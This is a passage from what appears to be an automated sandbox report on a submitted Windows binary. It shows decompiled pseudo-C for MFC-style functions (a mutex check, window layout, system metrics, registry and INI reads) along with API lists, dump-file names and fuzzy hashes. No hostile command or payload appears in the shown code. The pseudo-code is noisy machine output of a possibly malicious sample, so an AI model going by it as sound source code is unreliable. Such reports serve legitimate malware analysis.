					_v20 = _t28;
					_v8 = 0;
					_t79 = _t28;
					if(_t28 == 0) {
						_t29 = 0;
						__eflags = 0;
					} else {
						_t29 = E009B513D(_t28, _t79, 0x80, 0xad76fc, 0xad70ec, 0xad78c8); // executed
					}
					_t64 = _t63 | 0xffffffff;
					_push(_t29);
					_v8 = _t64;
					E009B3BAE(_t43, _t68, _t64, _t68, _t79);
					E009B2204( &_v64, _t79);
					_v8 = 1;
					E009B16CB( &_v64);
					_push( &_v64);
					_t34 = E009B39FE(_t43, _t68, _t64, _t68, _t79); // executed
					if(_t34 != 0) {
						E009B0BD1( *((intOrPtr*)(_t68 + 0x20)), 5);
						UpdateWindow( *( *((intOrPtr*)(_t68 + 0x20)) + 0x20));
						_v8 = _t64;
						E009B226E( &_v64,  *( *((intOrPtr*)(_t68 + 0x20)) + 0x20));
						 *[fs:0x0] = _v16;
						return 1;
					} else {
						_v8 = _t64;
						E009B226E( &_v64, _t60);
						 *[fs:0x0] = _v16;
						return 0;
					}
				}
				_t78 = _t24 - 0xb7;
				if(_t24 != 0xb7) {
					goto L4;
				}
				CloseHandle(_t63);
				E00AACBDC(0);
				goto L3;
			}






















      0x009a47d0
      0x009a47d0
      0x009a47d3
      0x009a47d5
      0x009a47e0
      0x009a47e5
      0x009a47e6
      0x009a47ed
      0x009a47f1
      0x009a47f7
      0x009a47fb
      0x009a480c
      0x009a4812
      0x009a4814
      0x009a481c
      0x009a4833
      0x009a4835
      0x009a483b
      0x009a4842
      0x009a4847
      0x009a484b
      0x009a4855
      0x009a485d
      0x009a4860
      0x009a4867
      0x009a4869
      0x009a4888
      0x009a4888
      0x009a486b
      0x009a4881
      0x009a4881
      0x009a488a
      0x009a488d
      0x009a4890
      0x009a4893
      0x009a489b
      0x009a48a6
      0x009a48ad
      0x009a48b5
      0x009a48b8
      0x009a48bf
      0x009a48e4
      0x009a48f0
      0x009a48f9
      0x009a48fc
      0x009a4909
      0x009a4916
      0x009a48c1
      0x009a48c4
      0x009a48c7
      0x009a48d1
      0x009a48de
      0x009a48de
      0x009a48bf
      0x009a481e
      0x009a4823
      0x00000000
      0x00000000
      0x009a4826
      0x009a482e
      0x00000000

      APIs
      • CreateMutexA.KERNELBASE(00000000,00000001,cplusplus_me), ref: 009A480C
      • GetLastError.KERNEL32 ref: 009A4814
      • CloseHandle.KERNEL32(00000000), ref: 009A4826
      • CloseHandle.KERNEL32(00000000), ref: 009A4835
      • UpdateWindow.USER32(?), ref: 009A48F0
      Strings
      • cplusplus_me, xrefs: 009A4803
      • Local AppWizard-Generated Applications, xrefs: 009A483B
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandle$CreateErrorLastMutexUpdateWindow
      • String ID: Local AppWizard-Generated Applications$cplusplus_me
      • API String ID: 672999849-156081089
      • Opcode ID: 3d63c35945c30da768bb598d1e937d79c93f5892c5f8100812724855d3ca8f35
      • Instruction ID: 2a7ca2cf7d25e33332f23caee58df4ac589351a21d6198c6c3793339b1f559a6
      • Opcode Fuzzy Hash: 3d63c35945c30da768bb598d1e937d79c93f5892c5f8100812724855d3ca8f35
      • Instruction Fuzzy Hash: 3C31CA71B45604BBDB04EBA4DD06BADB7B8FB84B10F00452AF916E33C1EFB565018B51
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A25E0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 331 9a25e0-9a2629 call ac5aed 334 9a262b-9a263c call ac5aed 331->334 335 9a2656-9a2664 331->335 343 9a264e-9a2651 call ac5b15 334->343 344 9a263e-9a2649 334->344 337 9a2688-9a268a 335->337 338 9a2666-9a266e 335->338 339 9a2670-9a2674 337->339 338->339 341 9a268c 338->341 339->341 345 9a2676-9a267e call ac5bb8 339->345 342 9a268e-9a2690 341->342 347 9a2692-9a2694 342->347 348 9a26f7-9a2719 call ac5b15 342->348 343->335 344->343 345->347 354 9a2680-9a2686 345->354 351 9a269a-9a269f call 9a2200 347->351 352 9a2696-9a2698 347->352 357 9a26a4-9a26aa 351->357 352->348 354->342 358 9a26ac-9a26c2 call aaaf63 call aab8c9 357->358 359 9a26c7-9a26e0 call ac5aed 357->359 358->359 364 9a26e2-9a26e3 359->364 365 9a26e6-9a26f4 call ac5b15 call ac5b41 359->365 364->365 365->348
      C-Code - Quality: 92%
      			E009A25E0(char _a4) {
				intOrPtr _v8;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v40;
				void* __edi;
				signed int _t29;
				intOrPtr _t33;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t42;
				void* _t45;
				signed int _t48;
				signed int _t49;
				char _t51;
				intOrPtr _t54;
				signed int _t70;
				intOrPtr _t71;
				signed int _t73;

				_push(0xffffffff);
				_push(0xac7878);
				_push( *[fs:0x0]);
				_t29 =  *0xd0c910; // 0x3a0e8b0c
				_push(_t29 ^ _t73);
				 *[fs:0x0] =  &_v16;
				E00AC5AED( &_v28, 0);
				_t51 =  *0xd0e044; // 0x2788370
				_v8 = 0;
				_v20 = _t51;
				if( *0xd1451c == 0) {
					E00AC5AED( &_v24, 0);
					if( *0xd1451c == 0) {
						_t48 =  *0xd14518; // 0x2
						_t49 = _t48 + 1;
						 *0xd14518 = _t49;
						 *0xd1451c = _t49;
					}
					E00AC5B15( &_v24);
				}
				_t67 = _a4;
				_t70 =  *0xd1451c; // 0x1
				_t33 =  *_a4;
				if(_t70 >=  *((intOrPtr*)(_t33 + 0xc))) {
					_t54 = 0;
					goto L6;
				} else {
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t33 + 8)) + _t70 * 4));
					if(_t54 != 0) {
						L10:
						_t71 = _t54;
						L11:
						if(_t71 != 0) {
							L19:
							_v8 = 0xffffffff;
							E00AC5B15( &_v28);
							 *[fs:0x0] = _v16;
							return _t71;
						}
						L12:
						if(_t51 == 0) {
							_t37 = E009A2200(_t65, _t67,  &_v20, _t67); // executed
							__eflags = _t37 - 0xffffffff;
							if(_t37 == 0xffffffff) {
								E00AAAF63( &_v40, "bad cast");
								E00AAB8C9( &_v40, 0xb0b234);
							}
							_t71 = _v20;
							 *0xd0e044 = _t71;
							E00AC5AED( &_a4, 0);
							_t39 =  *((intOrPtr*)(_t71 + 4));
							__eflags = _t39 - 0xffffffff;
							if(_t39 < 0xffffffff) {
								_t42 = _t39 + 1;
								__eflags = _t42;
								 *((intOrPtr*)(_t71 + 4)) = _t42;
							}
							E00AC5B15( &_a4);
							E00AC5B41(__eflags, _t71);
						} else {
							_t71 = _t51;
						}
						goto L19;
					}
					L6:
					if( *((char*)(_t33 + 0x14)) == 0) {
						goto L10;
					}
					_t45 = E00AC5BB8();
					if(_t70 >=  *((intOrPtr*)(_t45 + 0xc))) {
						goto L12;
					}
					_t65 =  *((intOrPtr*)(_t45 + 8));
					_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)) + _t70 * 4));
					goto L11;
				}
			}























      0x009a25e3
      0x009a25e5
      0x009a25f0
      0x009a25f7
      0x009a25fe
      0x009a2602
      0x009a260d
      0x009a2619
      0x009a261f
      0x009a2626
      0x009a2629
      0x009a2630
      0x009a263c
      0x009a263e
      0x009a2643
      0x009a2644
      0x009a2649
      0x009a2649
      0x009a2651
      0x009a2651
      0x009a2656
      0x009a2659
      0x009a265f
      0x009a2664
      0x009a2688
      0x00000000
      0x009a2666
      0x009a2669
      0x009a266e
      0x009a268c
      0x009a268c
      0x009a268e
      0x009a2690
      0x009a26f7
      0x009a26fa
      0x009a2701
      0x009a270b
      0x009a2719
      0x009a2719
      0x009a2692
      0x009a2694
      0x009a269f
      0x009a26a7
      0x009a26aa
      0x009a26b4
      0x009a26c2
      0x009a26c2
      0x009a26c7
      0x009a26cf
      0x009a26d5
      0x009a26da
      0x009a26dd
      0x009a26e0
      0x009a26e2
      0x009a26e2
      0x009a26e3
      0x009a26e3
      0x009a26e9
      0x009a26ef
      0x009a2696
      0x009a2696
      0x009a2696
      0x00000000
      0x009a2694
      0x009a2670
      0x009a2674
      0x00000000
      0x00000000
      0x009a2676
      0x009a267e
      0x00000000
      0x00000000
      0x009a2680
      0x009a2683
      0x00000000
      0x009a2683

      APIs
      • std::_Lockit::_Lockit.LIBCPMT ref: 009A260D
      • std::_Lockit::_Lockit.LIBCPMT ref: 009A2630
      • std::bad_exception::bad_exception.LIBCMT ref: 009A26B4
      • __CxxThrowException@8.LIBCMT ref: 009A26C2
      • std::_Lockit::_Lockit.LIBCPMT ref: 009A26D5
      • std::locale::facet::_Facet_Register.LIBCPMT ref: 009A26EF
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
      • String ID: bad cast
      • API String ID: 2427920155-3145022300
      • Opcode ID: b63bb40a605e85aad4cbdeb144da549db63435c49cb74761d2286d879fd5a777
      • Instruction ID: 8aaa2ae0a3e97c24ae16e7ef299c8b524238f32f50709cb6e3a54bf9843e4356
      • Opcode Fuzzy Hash: b63bb40a605e85aad4cbdeb144da549db63435c49cb74761d2286d879fd5a777
      • Instruction Fuzzy Hash: 1131DFB1D012059BCB14DF68D981FAEB7B4EB05720F01465EE826A72D1EB31AE41CFE1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AD091 Relevance: 12.1, APIs: 8, Instructions: 134windowCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 371 9ad091-9ad0c2 372 9ad0cd-9ad0d4 GetClientRect 371->372 373 9ad0c4-9ad0cb 371->373 374 9ad0da-9ad0e8 372->374 373->374 375 9ad0ea-9ad0f5 BeginDeferWindowPos 374->375 376 9ad0f7 374->376 377 9ad0fb-9ad10d GetTopWindow 375->377 376->377 378 9ad159-9ad15d 377->378 379 9ad10f-9ad121 GetDlgCtrlID call 9ac937 377->379 380 9ad15f-9ad162 378->380 381 9ad184-9ad187 378->381 388 9ad128-9ad12b 379->388 389 9ad123-9ad126 379->389 384 9ad171-9ad182 380->384 385 9ad164-9ad16f CopyRect 380->385 386 9ad1d8-9ad1db 381->386 387 9ad189-9ad18c 381->387 391 9ad1e6-9ad1f4 call aab46a 384->391 385->391 390 9ad1dd-9ad1e0 KiUserCallbackDispatcher 386->390 386->391 387->386 392 9ad18e-9ad19a call 9ac90b 387->392 393 9ad148-9ad155 GetWindow 388->393 394 9ad12d-9ad130 388->394 389->393 390->391 401 9ad19c-9ad1b0 392->401 402 9ad1b3-9ad1ba 392->402 393->379 399 9ad157 393->399 394->393 398 9ad132-9ad134 394->398 398->393 403 9ad136-9ad142 SendMessageA 398->403 399->378 401->402 402->386 404 9ad1bc-9ad1d3 call 9aa887 402->404 403->393 404->386
      C-Code - Quality: 89%
      			E009AD091(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, struct tagRECT* _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				intOrPtr _v12;
				long _v16;
				long _v20;
				struct tagRECT _v36;
				void* _v40;
				struct HWND__* _v44;
				signed int _v48;
				intOrPtr _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t59;
				signed int _t65;
				signed int _t75;
				struct tagRECT* _t79;
				intOrPtr _t80;
				long _t90;
				int _t91;
				struct HWND__* _t94;
				signed int _t95;

				_t80 = __ecx;
				_t59 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t59 ^ _t95;
				_t89 = _a28;
				_t79 = _a20;
				_v52 = __ecx;
				_v44 = 0;
				_v12 = _a28;
				_v16 = 0;
				_v20 = 0;
				if(_a24 == 0) {
					GetClientRect( *(__ecx + 0x20),  &_v36);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				_t65 = _a16 & 0xffff7fff;
				_v48 = _t65;
				if(_t65 == 1) {
					_t16 =  &_v40;
					 *_t16 = _v40 & 0x00000000;
					__eflags =  *_t16;
				} else {
					_v40 = BeginDeferWindowPos(8);
				}
				_t94 = GetTopWindow( *(_v52 + 0x20));
				_t90 = 0;
				_t98 = _t94;
				if(_t94 == 0) {
					L15:
					if(_v48 != 1) {
						__eflags = _a12 - _t90;
						if(_a12 != _t90) {
							__eflags = _v44 - _t90;
							if(_v44 != _t90) {
								_t67 = E009AC90B(_t79, _t80, _t89, _v44);
								__eflags = _v48 - 2;
								if(_v48 == 2) {
									_v36.left = _v36.left + _t79->left;
									_v36.top = _v36.top + _t79->top;
									_v36.right = _v36.right - _t79->right;
									_t46 =  &(_v36.bottom);
									 *_t46 = _v36.bottom - _t79->bottom;
									__eflags =  *_t46;
								}
								__eflags = _a16 & 0x00008000;
								if((_a16 & 0x00008000) == 0) {
									_t89 =  *_t67;
									 *((intOrPtr*)( *_t67 + 0x68))( &_v36, _t90);
									_t67 = E009AA887( &_v40, _v44,  &_v36);
								}
							}
						}
						__eflags = _v40 - _t90;
						if(_v40 != _t90) {
							_t67 = EndDeferWindowPos(_v40); // executed
						}
					} else {
						if(_a28 == _t90) {
							_t79->right = _v20;
							_t67 = _v16;
							_t79->top = _t90;
							_t79->left = _t90;
							_t79->bottom = _v16;
						} else {
							_t67 = CopyRect(_t79,  &_v36);
						}
					}
					return E00AAB46A(_t67, _t79, _v8 ^ _t95, _t89, _t90, _t94);
				} else {
					do {
						_t91 = GetDlgCtrlID(_t94);
						_t75 = E009AC937(_t79, _t80, _t89, _t91, _t94, _t98, _t94);
						if(_t91 != _a12) {
							__eflags = _t91 - _a4;
							if(__eflags >= 0) {
								__eflags = _t91 - _a8;
								if(__eflags <= 0) {
									__eflags = _t75;
									if(__eflags != 0) {
										SendMessageA(_t94, 0x361, 0,  &_v40);
									}
								}
							}
						} else {
							_v44 = _t94;
						}
						_t94 = GetWindow(_t94, 2);
					} while (_t94 != 0);
					_t90 = 0;
					goto L15;
				}
			}
























      0x009ad091
      0x009ad099
      0x009ad0a0
      0x009ad0a3
      0x009ad0a7
      0x009ad0b1
      0x009ad0b4
      0x009ad0b7
      0x009ad0ba
      0x009ad0bd
      0x009ad0c2
      0x009ad0d4
      0x009ad0c4
      0x009ad0c7
      0x009ad0c8
      0x009ad0c9
      0x009ad0ca
      0x009ad0ca
      0x009ad0dd
      0x009ad0e2
      0x009ad0e8
      0x009ad0f7
      0x009ad0f7
      0x009ad0f7
      0x009ad0ea
      0x009ad0f2
      0x009ad0f2
      0x009ad107
      0x009ad109
      0x009ad10b
      0x009ad10d
      0x009ad159
      0x009ad15d
      0x009ad184
      0x009ad187
      0x009ad189
      0x009ad18c
      0x009ad191
      0x009ad196
      0x009ad19a
      0x009ad19e
      0x009ad1a4
      0x009ad1aa
      0x009ad1b0
      0x009ad1b0
      0x009ad1b0
      0x009ad1b0
      0x009ad1b3
      0x009ad1ba
      0x009ad1bc
      0x009ad1c5
      0x009ad1d3
      0x009ad1d3
      0x009ad1ba
      0x009ad18c
      0x009ad1d8
      0x009ad1db
      0x009ad1e0
      0x009ad1e0
      0x009ad15f
      0x009ad162
      0x009ad174
      0x009ad177
      0x009ad17a
      0x009ad17d
      0x009ad17f
      0x009ad164
      0x009ad169
      0x009ad169
      0x009ad162
      0x009ad1f4
      0x009ad10f
      0x009ad10f
      0x009ad117
      0x009ad119
      0x009ad121
      0x009ad128
      0x009ad12b
      0x009ad12d
      0x009ad130
      0x009ad132
      0x009ad134
      0x009ad142
      0x009ad142
      0x009ad134
      0x009ad130
      0x009ad123
      0x009ad123
      0x009ad123
      0x009ad151
      0x009ad153
      0x009ad157
      0x00000000
      0x009ad157

      APIs
      • GetClientRect.USER32(?,0000E900), ref: 009AD0D4
      • BeginDeferWindowPos.USER32(00000008), ref: 009AD0EC
      • GetTopWindow.USER32(?), ref: 009AD101
      • GetDlgCtrlID.USER32 ref: 009AD110
      • SendMessageA.USER32 ref: 009AD142
      • GetWindow.USER32(00000000,00000002), ref: 009AD14B
      • CopyRect.USER32 ref: 009AD169
      • KiUserCallbackDispatcher.NTDLL(00000000,?,00000001), ref: 009AD1E0
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$Rect$BeginCallbackClientCopyCtrlDeferDispatcherMessageSendUser
      • String ID:
      • API String ID: 1656430526-0
      • Opcode ID: b76027646c2de3bf257368c1b25bbc9ab76ab65359c51b62476a2be6b54d82e2
      • Instruction ID: 08128d41857aec13df687e7627c4aeacbe9386759df807e1a2362b7712367b04
      • Opcode Fuzzy Hash: b76027646c2de3bf257368c1b25bbc9ab76ab65359c51b62476a2be6b54d82e2
      • Instruction Fuzzy Hash: 36515971906219DFCF14DFA8C884AEEBBB9FF8A310F14456AE816B7210D7359941CFA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009BE5F2 Relevance: 12.0, APIs: 8, Instructions: 39COMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 100%
      			E009BE5F2(void* __ecx) {
				int _t5;
				struct HDC__* _t15;
				void* _t17;

				_t17 = __ecx; // executed
				_t5 = GetSystemMetrics(0xb); // executed
				 *((intOrPtr*)(_t17 + 8)) = _t5;
				 *((intOrPtr*)(_t17 + 0xc)) = GetSystemMetrics(0xc);
				 *0xd0fd08 = GetSystemMetrics(2) + 1;
				 *0xd0fd0c = GetSystemMetrics(3) + 1;
				_t15 = GetDC(0);
				 *((intOrPtr*)(_t17 + 0x18)) = GetDeviceCaps(_t15, 0x58);
				 *((intOrPtr*)(_t17 + 0x1c)) = GetDeviceCaps(_t15, 0x5a);
				return ReleaseDC(0, _t15);
			}






      0x009be5ff
      0x009be601
      0x009be605
      0x009be60c
      0x009be614
      0x009be61e
      0x009be62f
      0x009be639
      0x009be641
      0x009be64d

      APIs
      • KiUserCallbackDispatcher.NTDLL ref: 009BE601
      • GetSystemMetrics.USER32 ref: 009BE608
      • GetSystemMetrics.USER32 ref: 009BE60F
      • GetSystemMetrics.USER32 ref: 009BE619
      • GetDC.USER32(00000000), ref: 009BE623
      • GetDeviceCaps.GDI32(00000000,00000058), ref: 009BE634
      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009BE63C
      • ReleaseDC.USER32 ref: 009BE644
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
      • String ID:
      • API String ID: 1031845853-0
      • Opcode ID: 7d8650470503e1df1ed3b98ec0262267ebf1475869bdcc8a8ea0e83db3f68ac6
      • Instruction ID: 1090c791e6d6d99b70c9d326a549d84300be7f222c9555e3c97ee825356e5e7c
      • Opcode Fuzzy Hash: 7d8650470503e1df1ed3b98ec0262267ebf1475869bdcc8a8ea0e83db3f68ac6
      • Instruction Fuzzy Hash: 92F01DB1E40714AAE7109FB2AC49B167F68EB84761F108527F6059B6C0DBB598528FD0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B368F Relevance: 10.7, APIs: 7, Instructions: 243registryCOMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 77%
      			E009B368F(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, int _a8, char* _a12, int _a16, signed int _a20) {
				int* _v4;
				signed int _v8;
				char* _v12;
				void* _v16;
				signed int* _v20;
				signed int _v24;
				void* _v28;
				char _v40;
				signed int _v44;
				char _v4120;
				CHAR* _v4124;
				char _v4128;
				void* _v4132;
				long _v4136;
				int _v4140;
				int _v4144;
				char* _v4148;
				int* _v4156;
				char* _v4168;
				unsigned int _t83;
				char* _t85;
				char* _t88;
				signed int _t94;
				signed int _t95;
				CHAR* _t97;
				signed int _t103;
				signed int _t108;
				signed int _t113;
				char* _t118;
				signed int _t121;
				void* _t123;
				long _t124;
				char* _t127;
				long _t129;
				unsigned int* _t131;
				signed int* _t132;
				void* _t133;
				void* _t142;
				void* _t154;
				void* _t168;
				signed int _t169;
				char** _t172;
				char* _t173;
				void* _t174;
				char* _t177;
				void* _t179;
				void* _t181;
				signed int _t184;
				signed int _t186;

				_push(0x10);
				E00AAD232(0xac82e7, __ebx, __edi, __esi);
				_t172 = _a16;
				_t131 = _a20;
				_t177 = 0;
				 *_t172 = 0;
				 *_t131 = 0;
				_push(0);
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					_push(_a12);
					_push(_a8);
					_t167 =  &_a12;
					_push( &_a12);
					 *((intOrPtr*)( *__ecx + 0x84))();
					_t140 = _a12;
					_t83 =  *(_a12 - 0xc);
					_v4 = 1;
					__eflags = _t83;
					if(__eflags != 0) {
						_a20 = _t83;
						 *_t131 = _t83 >> 1;
						_t85 = E009A6291(__eflags, _t83 >> 1);
						_t142 = 0;
						 *_t172 = _t85;
						__eflags = _a20;
						if(_a20 <= 0) {
							L16:
							E009A5510( &(_a12[0xfffffffffffffff0]), _t167);
							_t88 = 1;
							__eflags = 1;
							goto L17;
						} else {
							while(1) {
								_t31 = _t142 + 1; // 0x1
								_t168 = _t31;
								__eflags = _t168 - _t177;
								if(_t168 < _t177) {
									break;
								}
								_t118 = _a12;
								_t131 =  *(_t118 - 0xc);
								__eflags = _t168 - _t131;
								if(_t168 > _t131) {
									break;
								} else {
									__eflags = _t142 - _t177;
									if(_t142 < _t177) {
										break;
									} else {
										__eflags = _t142 - _t131;
										if(_t142 > _t131) {
											break;
										} else {
											asm("cdq");
											_t167 =  *_t172;
											_t131 = ( *((intOrPtr*)(_t168 + _t118)) - 1 << 4) +  *((intOrPtr*)(_t142 + _t118)) - 0x41;
											_t121 = _t142 - _t168 >> 1;
											_t142 = _t142 + 2;
											( *_t172)[_t121] = _t131;
											__eflags = _t142 - _a20;
											if(_t142 < _a20) {
												continue;
											} else {
												goto L16;
											}
										}
									}
								}
								goto L32;
							}
							E009A54F0(_t131, _t142, _t168, _t172, _t177, 0x80070057);
							asm("int3");
							_t184 = _t186;
							_push(0xffffffff);
							_push(0xac830d);
							_push( *[fs:0x0]);
							E00AAB480(0x1020);
							_t94 =  *0xd0c910; // 0x3a0e8b0c
							_t95 = _t94 ^ _t184;
							_v44 = _t95;
							_push(_t131);
							_push(_t177);
							_push(_t172);
							_push(_t95);
							 *[fs:0x0] =  &_v40;
							_t173 = _v12;
							_t169 = _v8;
							_t132 = _v20;
							_t97 = _v16;
							_v4168 = _t173;
							_v4144 = _t169;
							_v4156 = 0;
							__eflags =  *(_t142 + 0x58);
							if( *(_t142 + 0x58) == 0) {
								__eflags = _t169;
								if(__eflags == 0) {
									_v4124 = 0xad8d30;
								}
								GetPrivateProfileStringA(_t97, _t173, _v4124,  &_v4120, 0x1000,  *(_t142 + 0x6c));
								_push( &_v4120);
								goto L30;
							} else {
								_t103 = E009B33F8(_t142, _t97, 0); // executed
								_v4132 = _t103;
								__eflags = _t103;
								if(__eflags != 0) {
									E009A5D70( &_v4128, _t169, E009B9D52());
									_t175 = RegQueryValueExA;
									_v12 = 0;
									_v4144 = 0;
									_v4140 = 0;
									_t108 = RegQueryValueExA(_v4132, _t173, 0,  &_v4144, 0,  &_v4140); // executed
									_v4136 = _t108;
									__eflags = _t108;
									if(_t108 == 0) {
										_v4136 = RegQueryValueExA(_v4132, _v4148, 0,  &_v4144, E009A5F20(_t132,  &_v4128, _t169, RegQueryValueExA, _v4140),  &_v4140);
										E009A876D(_t132,  &_v4128, RegQueryValueExA, 0xffffffff);
									}
									RegCloseKey(_v4132);
									__eflags = _v4136;
									if(__eflags != 0) {
										_push(_v4124);
										E009AFB60(_t132, _t132, _t169, _t175, 0, __eflags);
										_t154 = _v4128 + 0xfffffff0;
									} else {
										_t181 = _v4128 + 0xfffffff0;
										_t113 = E009A6C6C(_t181) + 0x10;
										__eflags = _t113;
										 *_t132 = _t113;
										_t154 = _t181;
									}
									E009A5510(_t154, _t169);
								} else {
									_push(_v4124);
									L30:
									E009AFB60(_t132, _t132, _t169, _t173, 0, __eflags);
								}
							}
							 *[fs:0x0] = _v20;
							_pop(_t174);
							_pop(_t179);
							_pop(_t133);
							__eflags = _v24 ^ _t184;
							return E00AAB46A(_t132, _t133, _v24 ^ _t184, _t169, _t174, _t179);
						}
					} else {
						E009A5510(_t140 + 0xfffffff0,  &_a12);
						goto L2;
					}
				} else {
					_push(_a8);
					_t123 = E009B33F8(__ecx);
					_v16 = _t123;
					if(_t123 != 0) {
						_v28 = _t123;
						_v24 = 0;
						_v20 = 0;
						_v4 = 0;
						_a16 = 0;
						_a8 = 0;
						_t124 = RegQueryValueExA(_t123, _a12, 0,  &_a16, 0,  &_a8);
						_t162 = _a8;
						 *_a20 = _a8;
						__eflags = _t124;
						if(__eflags != 0) {
							L7:
							_push( *_t172);
							E009A62C0();
							 *_t172 = _t177;
						} else {
							_t127 = E009A6291(__eflags, _t162);
							 *_t172 = _t127;
							_t129 = RegQueryValueExA(_v16, _a12, 0,  &_a16, _t127,  &_a8);
							__eflags = _t129;
							if(_t129 != 0) {
								goto L7;
							} else {
								_t177 = 1;
								__eflags = 1;
							}
						}
						E009B3320( &_v28);
						_t88 = _t177;
					} else {
						L2:
						_t88 = 0;
					}
